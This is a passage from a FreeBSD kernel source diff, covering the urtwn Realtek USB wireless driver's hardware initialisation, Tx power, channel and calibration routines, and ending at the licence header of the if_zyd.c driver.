urtwn_write_1(sc, R92C_TXPKTBUF_WMAC_LBK_BF_HD, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TRXFF_BNDY, R92C_TX_PAGE_BOUNDARY); urtwn_write_1(sc, R92C_TDECTRL + 1, R92C_TX_PAGE_BOUNDARY); /* Set queue to USB pipe mapping. */ reg = urtwn_read_2(sc, R92C_TRXDMA_CTRL); reg &= ~R92C_TRXDMA_CTRL_QMAP_M; if (nqueues == 1) { if (hashq) reg |= R92C_TRXDMA_CTRL_QMAP_HQ; else if (hasnq) reg |= R92C_TRXDMA_CTRL_QMAP_NQ; else reg |= R92C_TRXDMA_CTRL_QMAP_LQ; } else if (nqueues == 2) { /* All 2-endpoints configs have a high priority queue. */ if (!hashq) return (EIO); if (hasnq) reg |= R92C_TRXDMA_CTRL_QMAP_HQ_NQ; else reg |= R92C_TRXDMA_CTRL_QMAP_HQ_LQ; } else reg |= R92C_TRXDMA_CTRL_QMAP_3EP; urtwn_write_2(sc, R92C_TRXDMA_CTRL, reg); /* Set Tx/Rx transfer page boundary. */ urtwn_write_2(sc, R92C_TRXFF_BNDY + 2, 0x27ff); /* Set Tx/Rx transfer page size. */ urtwn_write_1(sc, R92C_PBP, SM(R92C_PBP_PSRX, R92C_PBP_128) | SM(R92C_PBP_PSTX, R92C_PBP_128)); return (0); } static void urtwn_mac_init(struct urtwn_softc *sc) { int i; /* Write MAC initialization values. */ for (i = 0; i < nitems(rtl8192cu_mac); i++) urtwn_write_1(sc, rtl8192cu_mac[i].reg, rtl8192cu_mac[i].val); } static void urtwn_bb_init(struct urtwn_softc *sc) { const struct urtwn_bb_prog *prog; uint32_t reg; int i; /* Enable BB and RF. */ urtwn_write_2(sc, R92C_SYS_FUNC_EN, urtwn_read_2(sc, R92C_SYS_FUNC_EN) | R92C_SYS_FUNC_EN_BBRSTB | R92C_SYS_FUNC_EN_BB_GLB_RST | R92C_SYS_FUNC_EN_DIO_RF); urtwn_write_2(sc, R92C_AFE_PLL_CTRL, 0xdb83); urtwn_write_1(sc, R92C_RF_CTRL, R92C_RF_CTRL_EN | R92C_RF_CTRL_RSTB | R92C_RF_CTRL_SDMRSTB); urtwn_write_1(sc, R92C_SYS_FUNC_EN, R92C_SYS_FUNC_EN_USBA | R92C_SYS_FUNC_EN_USBD | R92C_SYS_FUNC_EN_BB_GLB_RST | R92C_SYS_FUNC_EN_BBRSTB); urtwn_write_1(sc, R92C_LDOHCI12_CTRL, 0x0f); urtwn_write_1(sc, 0x15, 0xe9); urtwn_write_1(sc, R92C_AFE_XTAL_CTRL + 1, 0x80); /* Select BB programming based on board type. */ if (!(sc->chip & URTWN_CHIP_92C)) { if (sc->board_type == R92C_BOARD_TYPE_MINICARD) prog = &rtl8188ce_bb_prog; else if (sc->board_type == R92C_BOARD_TYPE_HIGHPA) prog = &rtl8188ru_bb_prog; else prog = &rtl8188cu_bb_prog; } else { if (sc->board_type == R92C_BOARD_TYPE_MINICARD) prog = &rtl8192ce_bb_prog; else prog = &rtl8192cu_bb_prog; } /* Write BB initialization values. */ for (i = 0; i < prog->count; i++) { urtwn_bb_write(sc, prog->regs[i], prog->vals[i]); DELAY(1); } if (sc->chip & URTWN_CHIP_92C_1T2R) { /* 8192C 1T only configuration. */ reg = urtwn_bb_read(sc, R92C_FPGA0_TXINFO); reg = (reg & ~0x00000003) | 0x2; urtwn_bb_write(sc, R92C_FPGA0_TXINFO, reg); reg = urtwn_bb_read(sc, R92C_FPGA1_TXINFO); reg = (reg & ~0x00300033) | 0x00200022; urtwn_bb_write(sc, R92C_FPGA1_TXINFO, reg); reg = urtwn_bb_read(sc, R92C_CCK0_AFESETTING); reg = (reg & ~0xff000000) | 0x45 << 24; urtwn_bb_write(sc, R92C_CCK0_AFESETTING, reg); reg = urtwn_bb_read(sc, R92C_OFDM0_TRXPATHENA); reg = (reg & ~0x000000ff) | 0x23; urtwn_bb_write(sc, R92C_OFDM0_TRXPATHENA, reg); reg = urtwn_bb_read(sc, R92C_OFDM0_AGCPARAM1); reg = (reg & ~0x00000030) | 1 << 4; urtwn_bb_write(sc, R92C_OFDM0_AGCPARAM1, reg); reg = urtwn_bb_read(sc, 0xe74); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe74, reg); reg = urtwn_bb_read(sc, 0xe78); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe78, reg); reg = urtwn_bb_read(sc, 0xe7c); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe7c, reg); reg = urtwn_bb_read(sc, 0xe80); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe80, reg); reg = urtwn_bb_read(sc, 0xe88); reg = (reg & ~0x0c000000) | 2 << 26; urtwn_bb_write(sc, 0xe88, reg); } /* Write AGC values. */ for (i = 0; i < prog->agccount; i++) { urtwn_bb_write(sc, R92C_OFDM0_AGCRSSITABLE, prog->agcvals[i]); DELAY(1); } if (urtwn_bb_read(sc, R92C_HSSI_PARAM2(0)) & R92C_HSSI_PARAM2_CCK_HIPWR) sc->sc_flags |= URTWN_FLAG_CCK_HIPWR; } void urtwn_rf_init(struct urtwn_softc *sc) { const struct urtwn_rf_prog *prog; uint32_t reg, type; int i, j, idx, off; /* Select RF programming based on board type. */ if (!(sc->chip & URTWN_CHIP_92C)) { if (sc->board_type == R92C_BOARD_TYPE_MINICARD) prog = rtl8188ce_rf_prog; else if (sc->board_type == R92C_BOARD_TYPE_HIGHPA) prog = rtl8188ru_rf_prog; else prog = rtl8188cu_rf_prog; } else prog = rtl8192ce_rf_prog; for (i = 0; i < sc->nrxchains; i++) { /* Save RF_ENV control type. */ idx = i / 2; off = (i % 2) * 16; reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACESW(idx)); type = (reg >> off) & 0x10; /* Set RF_ENV enable. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACEOE(i)); reg |= 0x100000; urtwn_bb_write(sc, R92C_FPGA0_RFIFACEOE(i), reg); DELAY(1); /* Set RF_ENV output high. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACEOE(i)); reg |= 0x10; urtwn_bb_write(sc, R92C_FPGA0_RFIFACEOE(i), reg); DELAY(1); /* Set address and data lengths of RF registers. */ reg = urtwn_bb_read(sc, R92C_HSSI_PARAM2(i)); reg &= ~R92C_HSSI_PARAM2_ADDR_LENGTH; urtwn_bb_write(sc, R92C_HSSI_PARAM2(i), reg); DELAY(1); reg = urtwn_bb_read(sc, R92C_HSSI_PARAM2(i)); reg &= ~R92C_HSSI_PARAM2_DATA_LENGTH; urtwn_bb_write(sc, R92C_HSSI_PARAM2(i), reg); DELAY(1); /* Write RF initialization values for this chain. */ for (j = 0; j < prog[i].count; j++) { if (prog[i].regs[j] >= 0xf9 && prog[i].regs[j] <= 0xfe) { /* * These are fake RF registers offsets that * indicate a delay is required. */ usb_pause_mtx(&sc->sc_mtx, 50); continue; } urtwn_rf_write(sc, i, prog[i].regs[j], prog[i].vals[j]); DELAY(1); } /* Restore RF_ENV control type. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFIFACESW(idx)); reg &= ~(0x10 << off) | (type << off); urtwn_bb_write(sc, R92C_FPGA0_RFIFACESW(idx), reg); /* Cache RF register CHNLBW. */ sc->rf_chnlbw[i] = urtwn_rf_read(sc, i, R92C_RF_CHNLBW); } if ((sc->chip & (URTWN_CHIP_UMC_A_CUT | URTWN_CHIP_92C)) == URTWN_CHIP_UMC_A_CUT) { urtwn_rf_write(sc, 0, R92C_RF_RX_G1, 0x30255); urtwn_rf_write(sc, 0, R92C_RF_RX_G2, 0x50a00); } } static void urtwn_cam_init(struct urtwn_softc *sc) { /* Invalidate all CAM entries. */ urtwn_write_4(sc, R92C_CAMCMD, R92C_CAMCMD_POLLING | R92C_CAMCMD_CLR); } static void urtwn_pa_bias_init(struct urtwn_softc *sc) { uint8_t reg; int i; for (i = 0; i < sc->nrxchains; i++) { if (sc->pa_setting & (1 << i)) continue; urtwn_rf_write(sc, i, R92C_RF_IPA, 0x0f406); urtwn_rf_write(sc, i, R92C_RF_IPA, 0x4f406); urtwn_rf_write(sc, i, R92C_RF_IPA, 0x8f406); urtwn_rf_write(sc, i, R92C_RF_IPA, 0xcf406); } if (!(sc->pa_setting & 0x10)) { reg = urtwn_read_1(sc, 0x16); reg = (reg & ~0xf0) | 0x90; urtwn_write_1(sc, 0x16, reg); } } static void urtwn_rxfilter_init(struct urtwn_softc *sc) { /* Initialize Rx filter. */ /* TODO: use better filter for monitor mode. */ urtwn_write_4(sc, R92C_RCR, R92C_RCR_AAP | R92C_RCR_APM | R92C_RCR_AM | R92C_RCR_AB | R92C_RCR_APP_ICV | R92C_RCR_AMF | R92C_RCR_HTC_LOC_CTRL | R92C_RCR_APP_MIC | R92C_RCR_APP_PHYSTS); /* Accept all multicast frames. */ urtwn_write_4(sc, R92C_MAR + 0, 0xffffffff); urtwn_write_4(sc, R92C_MAR + 4, 0xffffffff); /* Accept all management frames. */ urtwn_write_2(sc, R92C_RXFLTMAP0, 0xffff); /* Reject all control frames. */ urtwn_write_2(sc, R92C_RXFLTMAP1, 0x0000); /* Accept all data frames. */ urtwn_write_2(sc, R92C_RXFLTMAP2, 0xffff); } static void urtwn_edca_init(struct urtwn_softc *sc) { urtwn_write_2(sc, R92C_SPEC_SIFS, 0x100a); urtwn_write_2(sc, R92C_MAC_SPEC_SIFS, 0x100a); urtwn_write_2(sc, R92C_SIFS_CCK, 0x100a); urtwn_write_2(sc, R92C_SIFS_OFDM, 0x100a); urtwn_write_4(sc, R92C_EDCA_BE_PARAM, 0x005ea42b); urtwn_write_4(sc, R92C_EDCA_BK_PARAM, 0x0000a44f); urtwn_write_4(sc, R92C_EDCA_VI_PARAM, 0x005ea324); urtwn_write_4(sc, R92C_EDCA_VO_PARAM, 0x002fa226); } void urtwn_write_txpower(struct urtwn_softc *sc, int chain, uint16_t power[URTWN_RIDX_COUNT]) { uint32_t reg; /* Write per-CCK rate Tx power. */ if (chain == 0) { reg = urtwn_bb_read(sc, R92C_TXAGC_A_CCK1_MCS32); reg = RW(reg, R92C_TXAGC_A_CCK1, power[0]); urtwn_bb_write(sc, R92C_TXAGC_A_CCK1_MCS32, reg); reg = urtwn_bb_read(sc, R92C_TXAGC_B_CCK11_A_CCK2_11); reg = RW(reg, R92C_TXAGC_A_CCK2, power[1]); reg = RW(reg, R92C_TXAGC_A_CCK55, power[2]); reg = RW(reg, R92C_TXAGC_A_CCK11, power[3]); urtwn_bb_write(sc, R92C_TXAGC_B_CCK11_A_CCK2_11, reg); } else { reg = urtwn_bb_read(sc, R92C_TXAGC_B_CCK1_55_MCS32); reg = RW(reg, R92C_TXAGC_B_CCK1, power[0]); reg = RW(reg, R92C_TXAGC_B_CCK2, power[1]); reg = RW(reg, R92C_TXAGC_B_CCK55, power[2]); urtwn_bb_write(sc, R92C_TXAGC_B_CCK1_55_MCS32, reg); reg = urtwn_bb_read(sc, R92C_TXAGC_B_CCK11_A_CCK2_11); reg = RW(reg, R92C_TXAGC_B_CCK11, power[3]); urtwn_bb_write(sc, R92C_TXAGC_B_CCK11_A_CCK2_11, reg); } /* Write per-OFDM rate Tx power. */ urtwn_bb_write(sc, R92C_TXAGC_RATE18_06(chain), SM(R92C_TXAGC_RATE06, power[ 4]) | SM(R92C_TXAGC_RATE09, power[ 5]) | SM(R92C_TXAGC_RATE12, power[ 6]) | SM(R92C_TXAGC_RATE18, power[ 7])); urtwn_bb_write(sc, R92C_TXAGC_RATE54_24(chain), SM(R92C_TXAGC_RATE24, power[ 8]) | SM(R92C_TXAGC_RATE36, power[ 9]) | SM(R92C_TXAGC_RATE48, power[10]) | SM(R92C_TXAGC_RATE54, power[11])); /* Write per-MCS Tx power. */ urtwn_bb_write(sc, R92C_TXAGC_MCS03_MCS00(chain), SM(R92C_TXAGC_MCS00, power[12]) | SM(R92C_TXAGC_MCS01, power[13]) | SM(R92C_TXAGC_MCS02, power[14]) | SM(R92C_TXAGC_MCS03, power[15])); urtwn_bb_write(sc, R92C_TXAGC_MCS07_MCS04(chain), SM(R92C_TXAGC_MCS04, power[16]) | SM(R92C_TXAGC_MCS05, power[17]) | SM(R92C_TXAGC_MCS06, power[18]) | SM(R92C_TXAGC_MCS07, power[19])); urtwn_bb_write(sc, R92C_TXAGC_MCS11_MCS08(chain), SM(R92C_TXAGC_MCS08, power[20]) | SM(R92C_TXAGC_MCS08, power[21]) | SM(R92C_TXAGC_MCS10, power[22]) | SM(R92C_TXAGC_MCS11, power[23])); urtwn_bb_write(sc, R92C_TXAGC_MCS15_MCS12(chain), SM(R92C_TXAGC_MCS12, power[24]) | SM(R92C_TXAGC_MCS13, power[25]) | SM(R92C_TXAGC_MCS14, power[26]) | SM(R92C_TXAGC_MCS15, power[27])); } void urtwn_get_txpower(struct urtwn_softc *sc, int chain, struct ieee80211_channel *c, struct ieee80211_channel *extc, uint16_t power[URTWN_RIDX_COUNT]) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; struct r92c_rom *rom = &sc->rom; uint16_t cckpow, ofdmpow, htpow, diff, max; const struct urtwn_txpwr *base; int ridx, chan, group; /* Determine channel group. */ chan = ieee80211_chan2ieee(ic, c); /* XXX center freq! */ if (chan <= 3) group = 0; else if (chan <= 9) group = 1; else group = 2; /* Get original Tx power based on board type and RF chain. */ if (!(sc->chip & URTWN_CHIP_92C)) { if (sc->board_type == R92C_BOARD_TYPE_HIGHPA) base = &rtl8188ru_txagc[chain]; else base = &rtl8192cu_txagc[chain]; } else base = &rtl8192cu_txagc[chain]; memset(power, 0, URTWN_RIDX_COUNT * sizeof(power[0])); if (sc->regulatory == 0) { for (ridx = 0; ridx <= 3; ridx++) power[ridx] = base->pwr[0][ridx]; } for (ridx = 4; ridx < URTWN_RIDX_COUNT; ridx++) { if (sc->regulatory == 3) { power[ridx] = base->pwr[0][ridx]; /* Apply vendor limits. */ if (extc != NULL) max = rom->ht40_max_pwr[group]; else max = rom->ht20_max_pwr[group]; max = (max >> (chain * 4)) & 0xf; if (power[ridx] > max) power[ridx] = max; } else if (sc->regulatory == 1) { if (extc == NULL) power[ridx] = base->pwr[group][ridx]; } else if (sc->regulatory != 2) power[ridx] = base->pwr[0][ridx]; } /* Compute per-CCK rate Tx power. */ cckpow = rom->cck_tx_pwr[chain][group]; for (ridx = 0; ridx <= 3; ridx++) { power[ridx] += cckpow; if (power[ridx] > R92C_MAX_TX_PWR) power[ridx] = R92C_MAX_TX_PWR; } htpow = rom->ht40_1s_tx_pwr[chain][group]; if (sc->ntxchains > 1) { /* Apply reduction for 2 spatial streams. */ diff = rom->ht40_2s_tx_pwr_diff[group]; diff = (diff >> (chain * 4)) & 0xf; htpow = (htpow > diff) ? htpow - diff : 0; } /* Compute per-OFDM rate Tx power. */ diff = rom->ofdm_tx_pwr_diff[group]; diff = (diff >> (chain * 4)) & 0xf; ofdmpow = htpow + diff; /* HT->OFDM correction. */ for (ridx = 4; ridx <= 11; ridx++) { power[ridx] += ofdmpow; if (power[ridx] > R92C_MAX_TX_PWR) power[ridx] = R92C_MAX_TX_PWR; } /* Compute per-MCS Tx power. */ if (extc == NULL) { diff = rom->ht20_tx_pwr_diff[group]; diff = (diff >> (chain * 4)) & 0xf; htpow += diff; /* HT40->HT20 correction. */ } for (ridx = 12; ridx <= 27; ridx++) { power[ridx] += htpow; if (power[ridx] > R92C_MAX_TX_PWR) power[ridx] = R92C_MAX_TX_PWR; } #ifdef URTWN_DEBUG if (urtwn_debug >= 4) { /* Dump per-rate Tx power values. */ printf("Tx power for chain %d:\n", chain); for (ridx = 0; ridx < URTWN_RIDX_COUNT; ridx++) printf("Rate %d = %u\n", ridx, power[ridx]); } #endif } void urtwn_set_txpower(struct urtwn_softc *sc, struct ieee80211_channel *c, struct ieee80211_channel *extc) { uint16_t power[URTWN_RIDX_COUNT]; int i; for (i = 0; i < sc->ntxchains; i++) { /* Compute per-rate Tx power values. */ urtwn_get_txpower(sc, i, c, extc, power); /* Write per-rate Tx power values to hardware. */ urtwn_write_txpower(sc, i, power); } } static void urtwn_scan_start(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtwn_scan_end(struct ieee80211com *ic) { /* XXX do nothing? */ } static void urtwn_set_channel(struct ieee80211com *ic) { struct urtwn_softc *sc = ic->ic_ifp->if_softc; URTWN_LOCK(sc); urtwn_set_chan(sc, ic->ic_curchan, NULL); URTWN_UNLOCK(sc); } static void urtwn_update_mcast(struct ifnet *ifp) { /* XXX do nothing? */ } static void urtwn_set_chan(struct urtwn_softc *sc, struct ieee80211_channel *c, struct ieee80211_channel *extc) { struct ieee80211com *ic = sc->sc_ifp->if_l2com; uint32_t reg; u_int chan; int i; chan = ieee80211_chan2ieee(ic, c); /* XXX center freq! */ if (chan == 0 || chan == IEEE80211_CHAN_ANY) { device_printf(sc->sc_dev, "%s: invalid channel %x\n", __func__, chan); return; } /* Set Tx power for this new channel. */ urtwn_set_txpower(sc, c, extc); for (i = 0; i < sc->nrxchains; i++) { urtwn_rf_write(sc, i, R92C_RF_CHNLBW, RW(sc->rf_chnlbw[i], R92C_RF_CHNLBW_CHNL, chan)); } #ifndef IEEE80211_NO_HT if (extc != NULL) { /* Is secondary channel below or above primary? */ int prichlo = c->ic_freq < extc->ic_freq; urtwn_write_1(sc, R92C_BWOPMODE, urtwn_read_1(sc, R92C_BWOPMODE) & ~R92C_BWOPMODE_20MHZ); reg = urtwn_read_1(sc, R92C_RRSR + 2); reg = (reg & ~0x6f) | (prichlo ? 1 : 2) << 5; urtwn_write_1(sc, R92C_RRSR + 2, reg); urtwn_bb_write(sc, R92C_FPGA0_RFMOD, urtwn_bb_read(sc, R92C_FPGA0_RFMOD) | R92C_RFMOD_40MHZ); urtwn_bb_write(sc, R92C_FPGA1_RFMOD, urtwn_bb_read(sc, R92C_FPGA1_RFMOD) | R92C_RFMOD_40MHZ); /* Set CCK side band. */ reg = urtwn_bb_read(sc, R92C_CCK0_SYSTEM); reg = (reg & ~0x00000010) | (prichlo ? 0 : 1) << 4; urtwn_bb_write(sc, R92C_CCK0_SYSTEM, reg); reg = urtwn_bb_read(sc, R92C_OFDM1_LSTF); reg = (reg & ~0x00000c00) | (prichlo ? 1 : 2) << 10; urtwn_bb_write(sc, R92C_OFDM1_LSTF, reg); urtwn_bb_write(sc, R92C_FPGA0_ANAPARAM2, urtwn_bb_read(sc, R92C_FPGA0_ANAPARAM2) & ~R92C_FPGA0_ANAPARAM2_CBW20); reg = urtwn_bb_read(sc, 0x818); reg = (reg & ~0x0c000000) | (prichlo ? 2 : 1) << 26; urtwn_bb_write(sc, 0x818, reg); /* Select 40MHz bandwidth. */ urtwn_rf_write(sc, 0, R92C_RF_CHNLBW, (sc->rf_chnlbw[0] & ~0xfff) | chan); } else #endif { urtwn_write_1(sc, R92C_BWOPMODE, urtwn_read_1(sc, R92C_BWOPMODE) | R92C_BWOPMODE_20MHZ); urtwn_bb_write(sc, R92C_FPGA0_RFMOD, urtwn_bb_read(sc, R92C_FPGA0_RFMOD) & ~R92C_RFMOD_40MHZ); urtwn_bb_write(sc, R92C_FPGA1_RFMOD, urtwn_bb_read(sc, R92C_FPGA1_RFMOD) & ~R92C_RFMOD_40MHZ); urtwn_bb_write(sc, R92C_FPGA0_ANAPARAM2, urtwn_bb_read(sc, R92C_FPGA0_ANAPARAM2) | R92C_FPGA0_ANAPARAM2_CBW20); /* Select 20MHz bandwidth. */ urtwn_rf_write(sc, 0, R92C_RF_CHNLBW, (sc->rf_chnlbw[0] & ~0xfff) | R92C_RF_CHNLBW_BW20 | chan); } } static void urtwn_iq_calib(struct urtwn_softc *sc) { /* TODO */ } static void urtwn_lc_calib(struct urtwn_softc *sc) { uint32_t rf_ac[2]; uint8_t txmode; int i; txmode = urtwn_read_1(sc, R92C_OFDM1_LSTF + 3); if ((txmode & 0x70) != 0) { /* Disable all continuous Tx. */ urtwn_write_1(sc, R92C_OFDM1_LSTF + 3, txmode & ~0x70); /* Set RF mode to standby mode. */ for (i = 0; i < sc->nrxchains; i++) { rf_ac[i] = urtwn_rf_read(sc, i, R92C_RF_AC); urtwn_rf_write(sc, i, R92C_RF_AC, RW(rf_ac[i], R92C_RF_AC_MODE, R92C_RF_AC_MODE_STANDBY)); } } else { /* Block all Tx queues. */ urtwn_write_1(sc, R92C_TXPAUSE, 0xff); } /* Start calibration. */ urtwn_rf_write(sc, 0, R92C_RF_CHNLBW, urtwn_rf_read(sc, 0, R92C_RF_CHNLBW) | R92C_RF_CHNLBW_LCSTART); /* Give calibration the time to complete. */ usb_pause_mtx(&sc->sc_mtx, 100); /* Restore configuration. */ if ((txmode & 0x70) != 0) { /* Restore Tx mode. */ urtwn_write_1(sc, R92C_OFDM1_LSTF + 3, txmode); /* Restore RF mode. */ for (i = 0; i < sc->nrxchains; i++) urtwn_rf_write(sc, i, R92C_RF_AC, rf_ac[i]); } else { /* Unblock all Tx queues. */ urtwn_write_1(sc, R92C_TXPAUSE, 0x00); } } static void urtwn_init_locked(void *arg) { struct urtwn_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; uint32_t reg; int error; if (ifp->if_drv_flags & IFF_DRV_RUNNING) urtwn_stop_locked(ifp, 0); /* Init firmware commands ring. */ sc->fwcur = 0; /* Allocate Tx/Rx buffers. */ error = urtwn_alloc_rx_list(sc); if (error != 0) goto fail; error = urtwn_alloc_tx_list(sc); if (error != 0) goto fail; /* Power on adapter. */ error = urtwn_power_on(sc); if (error != 0) goto fail; /* Initialize DMA. */ error = urtwn_dma_init(sc); if (error != 0) goto fail; /* Set info size in Rx descriptors (in 64-bit words). */ urtwn_write_1(sc, R92C_RX_DRVINFO_SZ, 4); /* Init interrupts. */ urtwn_write_4(sc, R92C_HISR, 0xffffffff); urtwn_write_4(sc, R92C_HIMR, 0xffffffff); /* Set MAC address. */ urtwn_write_region_1(sc, R92C_MACID, IF_LLADDR(ifp), IEEE80211_ADDR_LEN); /* Set initial network type. */ reg = urtwn_read_4(sc, R92C_CR); reg = RW(reg, R92C_CR_NETTYPE, R92C_CR_NETTYPE_INFRA); urtwn_write_4(sc, R92C_CR, reg); urtwn_rxfilter_init(sc); reg = urtwn_read_4(sc, R92C_RRSR); reg = RW(reg, R92C_RRSR_RATE_BITMAP, R92C_RRSR_RATE_CCK_ONLY_1M); urtwn_write_4(sc, R92C_RRSR, reg); /* Set short/long retry limits. */ urtwn_write_2(sc, R92C_RL, SM(R92C_RL_SRL, 0x30) | SM(R92C_RL_LRL, 0x30)); /* Initialize EDCA parameters. */ urtwn_edca_init(sc); /* Setup rate fallback. */ urtwn_write_4(sc, R92C_DARFRC + 0, 0x00000000); urtwn_write_4(sc, R92C_DARFRC + 4, 0x10080404); urtwn_write_4(sc, R92C_RARFRC + 0, 0x04030201); urtwn_write_4(sc, R92C_RARFRC + 4, 0x08070605); urtwn_write_1(sc, R92C_FWHW_TXQ_CTRL, urtwn_read_1(sc, R92C_FWHW_TXQ_CTRL) | R92C_FWHW_TXQ_CTRL_AMPDU_RTY_NEW); /* Set ACK timeout. */ urtwn_write_1(sc, R92C_ACKTO, 0x40); /* Setup USB aggregation. */ reg = urtwn_read_4(sc, R92C_TDECTRL); reg = RW(reg, R92C_TDECTRL_BLK_DESC_NUM, 6); urtwn_write_4(sc, R92C_TDECTRL, reg); urtwn_write_1(sc, R92C_TRXDMA_CTRL, urtwn_read_1(sc, R92C_TRXDMA_CTRL) | R92C_TRXDMA_CTRL_RXDMA_AGG_EN); urtwn_write_1(sc, R92C_USB_SPECIAL_OPTION, urtwn_read_1(sc, R92C_USB_SPECIAL_OPTION) | R92C_USB_SPECIAL_OPTION_AGG_EN); urtwn_write_1(sc, R92C_RXDMA_AGG_PG_TH, 48); urtwn_write_1(sc, R92C_USB_DMA_AGG_TO, 4); urtwn_write_1(sc, R92C_USB_AGG_TH, 8); urtwn_write_1(sc, R92C_USB_AGG_TO, 6); /* Initialize beacon parameters. */ urtwn_write_2(sc, R92C_TBTT_PROHIBIT, 0x6404); urtwn_write_1(sc, R92C_DRVERLYINT, 0x05); urtwn_write_1(sc, R92C_BCNDMATIM, 0x02); urtwn_write_2(sc, R92C_BCNTCFG, 0x660f); /* Setup AMPDU aggregation. */ urtwn_write_4(sc, R92C_AGGLEN_LMT, 0x99997631); /* MCS7~0 */ urtwn_write_1(sc, R92C_AGGR_BREAK_TIME, 0x16); urtwn_write_2(sc, 0x4ca, 0x0708); urtwn_write_1(sc, R92C_BCN_MAX_ERR, 0xff); urtwn_write_1(sc, R92C_BCN_CTRL, R92C_BCN_CTRL_DIS_TSF_UDT0); /* Load 8051 microcode. */ error = urtwn_load_firmware(sc); if (error != 0) goto fail; /* Initialize MAC/BB/RF blocks. */ urtwn_mac_init(sc); urtwn_bb_init(sc); urtwn_rf_init(sc); /* Turn CCK and OFDM blocks on. */ reg = urtwn_bb_read(sc, R92C_FPGA0_RFMOD); reg |= R92C_RFMOD_CCK_EN; urtwn_bb_write(sc, R92C_FPGA0_RFMOD, reg); reg = urtwn_bb_read(sc, R92C_FPGA0_RFMOD); reg |= R92C_RFMOD_OFDM_EN; urtwn_bb_write(sc, R92C_FPGA0_RFMOD, reg); /* Clear per-station keys table. */ urtwn_cam_init(sc); /* Enable hardware sequence numbering. */ urtwn_write_1(sc, R92C_HWSEQ_CTRL, 0xff); /* Perform LO and IQ calibrations. */ urtwn_iq_calib(sc); /* Perform LC calibration. */ urtwn_lc_calib(sc); /* Fix USB interference issue. */ urtwn_write_1(sc, 0xfe40, 0xe0); urtwn_write_1(sc, 0xfe41, 0x8d); urtwn_write_1(sc, 0xfe42, 0x80); urtwn_pa_bias_init(sc); /* Initialize GPIO setting. */ urtwn_write_1(sc, R92C_GPIO_MUXCFG, urtwn_read_1(sc, R92C_GPIO_MUXCFG) & ~R92C_GPIO_MUXCFG_ENBT); /* Fix for lower temperature. */ urtwn_write_1(sc, 0x15, 0xe9); usbd_transfer_start(sc->sc_xfer[URTWN_BULK_RX]); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->sc_watchdog_ch, hz, urtwn_watchdog, sc); fail: return; } static void urtwn_init(void *arg) { struct urtwn_softc *sc = arg; URTWN_LOCK(sc); urtwn_init_locked(arg); URTWN_UNLOCK(sc); } static void urtwn_stop_locked(struct ifnet *ifp, int disable) { struct urtwn_softc *sc = ifp->if_softc; (void)disable; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); callout_stop(&sc->sc_watchdog_ch); urtwn_abort_xfers(sc); } static void urtwn_stop(struct ifnet *ifp, int disable) { struct urtwn_softc *sc = ifp->if_softc; URTWN_LOCK(sc); urtwn_stop_locked(ifp, disable); URTWN_UNLOCK(sc); } static void urtwn_abort_xfers(struct urtwn_softc *sc) { int i; URTWN_ASSERT_LOCKED(sc); /* abort any pending transfers */ for (i = 0; i < URTWN_N_TRANSFER; i++) usbd_transfer_stop(sc->sc_xfer[i]); } static int urtwn_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct urtwn_softc *sc = ifp->if_softc; struct urtwn_data *bf; /* prevent management frames from being sent if we're not ready */ if (!(ifp->if_drv_flags & IFF_DRV_RUNNING)) { m_freem(m); ieee80211_free_node(ni); return (ENETDOWN); } URTWN_LOCK(sc); bf = urtwn_getbuf(sc); if (bf == NULL) { ieee80211_free_node(ni); m_freem(m); URTWN_UNLOCK(sc); return (ENOBUFS); } ifp->if_opackets++; if (urtwn_tx_start(sc, ni, m, bf) != 0) { ieee80211_free_node(ni); ifp->if_oerrors++; STAILQ_INSERT_HEAD(&sc->sc_tx_inactive, bf, next); URTWN_UNLOCK(sc); return (EIO); } URTWN_UNLOCK(sc); sc->sc_txtimer = 5; return (0); } static device_method_t urtwn_methods[] = { /* Device interface */ DEVMETHOD(device_probe, urtwn_match), DEVMETHOD(device_attach, urtwn_attach), DEVMETHOD(device_detach, urtwn_detach), { 0, 0 } }; static driver_t urtwn_driver = { "urtwn", urtwn_methods, sizeof(struct urtwn_softc) }; static devclass_t urtwn_devclass; DRIVER_MODULE(urtwn, uhub, urtwn_driver, urtwn_devclass, NULL, NULL); MODULE_DEPEND(urtwn, usb, 1, 1, 1); MODULE_DEPEND(urtwn, wlan, 1, 1, 1); MODULE_DEPEND(urtwn, firmware, 1, 1, 1); MODULE_VERSION(urtwn, 1); diff --git a/sys/dev/usb/wlan/if_zyd.c b/sys/dev/usb/wlan/if_zyd.c index 504c270b0d3d..def2550d0f37 100644 --- a/sys/dev/usb/wlan/if_zyd.c +++ b/sys/dev/usb/wlan/if_zyd.c @@ -1,2975 +1,2975 @@ /* $OpenBSD: if_zyd.c,v 1.52 2007/02/11 00:08:04 jsg Exp $ */ /* $NetBSD: if_zyd.c,v 1.7 2007/06/21 04:04:29 kiyohara Exp $ */ /* $FreeBSD$ */ /*- * Copyright (c) 2006 by Damien Bergamini * Copyright (c) 2006 by Florian Stoehr * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES 